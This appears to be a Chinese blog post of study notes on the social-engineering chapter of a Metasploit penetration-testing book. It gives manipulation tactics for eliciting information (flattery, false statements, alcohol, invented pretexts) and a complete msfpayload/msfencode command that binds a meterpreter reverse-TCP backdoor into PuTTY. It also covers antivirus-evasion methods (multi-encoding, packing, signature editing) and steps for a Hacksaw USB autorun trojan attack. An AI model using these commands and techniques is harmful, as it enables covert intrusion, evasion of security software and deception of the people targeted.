1. 程式人生 > >《metasploit滲透測試魔鬼訓練營》學習筆記第七章--社會工程學

《metasploit滲透測試魔鬼訓練營》學習筆記第七章--社會工程學

五.社工工程學     5.1社會工程系框架          5.1.1資訊蒐集                 maltego是一個高度自動化的資訊蒐集工具,整合在BT5中,如果國內網路環境使用時無法獲取結果,可能是無法與資訊提供網站建立連線,可以使用VPN或代理伺服器。          5.1.2誘導                 1.提高誘導能力                   表現自然,學習知識,不要貪心。                 2.成功誘導的技巧                    迎合目標的自我感覺                    表達共同的興趣                    故意給出一個錯誤的陳述                    丟擲一些誘餌資訊以尋求回報                    假裝知曉                    藉助酒精的威力,讓目標更容易開口                 3.問答的種類                    開放式問答:無法只用“是”或“否”來回答問題                    封閉式問答:回答比較確定                    誘導性問答:組合了開放式和封閉式,期望誘匯出一些回答資訊                    假設性問答:假設目標已經知曉某種資訊          5.1.3託辭                  設計一個虛構的場景來說服目標洩露資訊。                  1.提升設計託辭的能力                     託辭的質量與資訊蒐集和誘導得到的資訊密切相關。實踐,實踐!                  2.設計託辭的原則                    研究功課做得越充分,成功的概率越大                    發揮你的個人興趣或專長                    聯習方言和表達                    充分利用電話                    託辭設計越簡單越好                    讓託辭看起來更自然                    向目標提供一個合乎邏輯的結論。     5.2社會工程學案例--偽裝木馬            木馬常見的偽裝方式:                          偽裝成不可執行檔案的圖示                          捆綁檔案偽裝                          組合偽裝           5.2.1木馬程式的製作                     製作一個木馬,主要考慮以下三點:                     ①確定監聽的IP和埠,木馬需要回連這個IP的埠。                     ②把木馬綁到一個合法程式上。                     ③木馬植入後,遷移到不會關閉的程序上。                     還要考慮木馬的穩定性,相容性,免殺等等。                     1.使用metasploit中的msfpayload功能生成基本的攻擊載荷程式                       msfpayload -l |grep 'windows'|grep ‘reverse_tcp’|grep 'meterpreter'                       -l用來列出攻擊載荷,grep命令來查詢所需要的攻擊載荷模組。                       在實際應用中建議修改回連監聽埠為80,53等常用埠。                     2.將攻擊載荷繫結到Putty程式                       msfpayload主要功能是將payload包裝成一個可執行檔案,或包裝指定格式輸出。用法如下: 執行msfpayload -h檢視都有哪些引數: Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar> OPTIONS:     -h        Help banner     -l        List available payloads #O--檢視payload資訊 #R--輸出raw原始資料,可以被傳輸到另一個程式如msfencode或重定向到另一個檔案 #C--輸出c程式                        msfencode主要功能是對輸入的資料繼續編碼,然後將編碼後的資料包裝成一個指定檔案。用法如下: Usage: /opt/metasploit/msf3/msfencode <options> OPTIONS:     -a <opt>  The architecture to encode as     -b <opt>  The list of characters to avoid: '\x00\xff' //避免的字元     -c <opt>  The number of times to encode the data  //編碼次數     -d <opt>  Specify the directory in which to look for EXE templates     -e <opt>  The encoder to use  //選擇使用哪種編碼器     -h        Help banner     -i <opt>  Encode the contents of the supplied file path     -k        Keep template working; run payload in new thread (use with -x)     -l        List available encoders  //列出所有可用的編碼器     -m <opt>  Specifies an additional module search path     -n        Dump encoder information     -o <opt>  The output file  //輸出檔案     -p <opt>  The platform to encode for     -s <opt>  The maximum size of the encoded data     -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war  //輸出檔案的格式     -v        Increase verbosity     -x <opt>  Specify an alternate executable template                      3.製作木馬程式 msfpayload /windows/meterpreter/reverse_tcp  LHOST=10.0.0.1 LPORT=80 R | msfencode -t exe -e x86/alpha_mixed -k -x /root/netcat/putty.exe -t elf -o dood_putty.exe -c 5
                     新生成的door_putty.exe就是木馬後門了。           5.2.2木馬的免殺處理                   1.加密免殺                     可以使用多重編碼技術增強偽裝木馬的免殺能力,但是複雜的組合可能導致編碼後的程式無法正常執行                   2.加殼免殺                     可以使用一些加殼工具對惡意程式碼進行加殼處理,比如UPX等                   3.修改特徵碼免殺                     大部分防毒軟體的根據就是對比特徵碼,對比硬碟中儲存的檔案的特徵碼,能全面地查殺,對比在記憶體中儲存的檔案特徵碼,可以快速的查殺,針對這一特性,可以用特徵碼定位軟體定位檔案特徵碼的所在之處,在用UltraEdit對被修改的特徵碼進行修改。一般的修改方法有:                     十六進位制的資料特徵碼直接修改法                     字串大小寫修改法                     等價替換法  把對應的彙編指令替換成功能類似的指令                     指令順序調換法                     通用跳轉法                     修改特徵碼的方法針對性很強,但只能針對一款防毒軟體,因為各家防毒軟體的特徵碼不一樣。       5.3社工攻擊工具包SET             可進行製作釣魚網站,釣魚郵件等等,功能強大,       5.4U盤 Hacksaw攻擊             向U盤寫入木馬程式,然後修改autorun.inf檔案,讓其指向木馬安裝程式,那麼windows會執行這個程式。             一些隱藏木馬的方式:             作為系統檔案隱藏             偽裝成其他檔案             藏於系統資料夾中             運用windows漏洞建立路徑不存在或者打不開的資料夾             製作Hacksaw U盤             Hacksaw是使用U盤進行攻擊的軟體,具體步驟如下:             1.下載安裝工具UltraISO             2.下載Hcaksaw             3.解壓下載的壓縮包到一個單獨目錄             4.插入U盤             5.啟動UltraISO,並開啟先前解壓後目錄下的cruzer-autorun.iso             6.點選啟動,寫入硬碟映像             7.選擇U盤並寫入             8.把payload目錄下的隱藏木馬WIP及攻擊載荷複製到準備好的U盤的跟目錄下             9.修改WIP/SBS目錄下的send.sat檔案             10.需要autorun.inf檔案  把shellexecute替換open             11.升級stunnel軟體             12.把autorun.inf和go.vbe修改為隱藏檔案